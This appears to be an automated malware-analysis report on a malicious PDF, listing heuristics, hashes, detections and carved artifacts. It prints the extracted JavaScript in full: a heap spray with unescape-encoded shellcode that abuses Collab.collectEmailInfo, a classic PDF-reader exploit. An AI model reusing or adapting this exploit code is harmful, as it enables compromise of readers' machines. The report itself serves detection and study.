MALICIOUS
208
Risk Score
Malware Insights
MITRE ATT&CK
T1059.001 PowerShell
The PDF file contains embedded JavaScript, indicated by the PDF_JAVASCRIPT and PDF_JS heuristics. The JavaScript stream, named 'javascript_obj0001_000.js', appears to be obfuscated, as suggested by the PDF_UNESCAPE firing and the 'Script obfuscation indicators' signal. The primary function of this script is likely to download and execute a secondary payload from a remote source, which is a common technique for initial access or further infection stages. Due to the obfuscation, the exact download URL or execution method could not be definitively determined.
Machine Learning
- Nyx PDF Classifier malicious score 0.9989
Heuristics 4
-
JavaScript action low 2 related findings PDF_JAVASCRIPTPDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTERPDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.Matched line in script
/Type /Annot /Subtype /Screen /Border [0 0 0]/AA << /PV << /S /JavaScript /JS (var a=new Array(1073741823); var fil=unescape('\%u0d0d'); for(var i=1;i<0x10000;i=i+i)fil=fil+fil; fil=fil+unescape("\%uc933\%ue983\%ud9dd\%ud9ee\%u2474\%u5bf4\%u7381\%ue213\%ub844\%u83b1\%ufceb\%uf4e2\%uac1e\%ub1fc\%u44e2\%uf433\%ucfde\%ub4c4\%u459a\%u3a57\%u5cad\%uee33\%u45c2\%uf853\%u7069\%ub033\%u750c\%u2878\%uc04e\%uc578\%u85e5\%ubc72\%u86e3\%u4553\%u10d9\%ub59c\%ua197\%uee33\%u45c6\%ud753\%u4869\%u3af3\%u58bd\%u5ab9\%u5869\% … /Rect [91.8009 386.1246 440.4934 734.817] -
Embedded JS stream low PDF_JSPDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
javascript_obj0001_000.js |
pdf-javascript-stream | PDF /JS object 1 at offset 0x106 | 816 bytes |
SHA-256: c0b141fe0c7bfb7000d19cb612f9610b75cfecf5c45d2bbe856518d06d71bb4d |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 3 eval/decoder/string-building token(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
var a=new Array(1073741823); var fil=unescape('%u0d0d'); for(var i=1;i<0x10000;i=i+i)fil=fil+fil; fil=fil+unescape("%uc933%ue983%ud9dd%ud9ee%u2474%u5bf4%u7381%ue213%ub844%u83b1%ufceb%uf4e2%uac1e%ub1fc%u44e2%uf433%ucfde%ub4c4%u459a%u3a57%u5cad%uee33%u45c2%uf853%u7069%ub033%u750c%u2878%uc04e%uc578%u85e5%ubc72%u86e3%u4553%u10d9%ub59c%ua197%uee33%u45c6%ud753%u4869%u3af3%u58bd%u5ab9%u5869%ub033%ucd09%u95e4%u87e6%u7189%ucf86%u81f8%u8467%ubdc0%u0469%u3ab4%u5892%u3a15%u4c8a%ub853%uc469%ub108%u44e2%ud933%u1bde%u4789%u1282%u4931%u8461%ue1c3%u3a8a%u5360%u2c91%u4f20%u4a68%u4eef%u2705%uddd9%u6a81%uc9dd%u4487%ub1b8"); for(var i=0;i<0xd00;i=i+1)a[i]=fil+i; var s=unescape('%ubeef%u0ded');for(var i=2;i<0x4000;i=i+i){s=s+s;a[i]=s;} Collab.collectEmailInfo(s,s,s,s,s,s,s,s,s,s); app.alert('done'); app.execMenuItem('Close');
|
|||
javascript_obj0001_000_shellcode_00.bin |
pdf-js-shellcode | pdf-js-unescape-shellcode recovered from PDF /JS object 1 at offset 0x106 | 164 bytes |
SHA-256: 1213565db01d40a0784b9998a50ab439b1db0d7b23c5863e070a5def7501a462 |
|||
|
Detection
ClamAV:
Win.Exploit.Fnstenv_mov-1
Obfuscation or payload:
unlikely
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.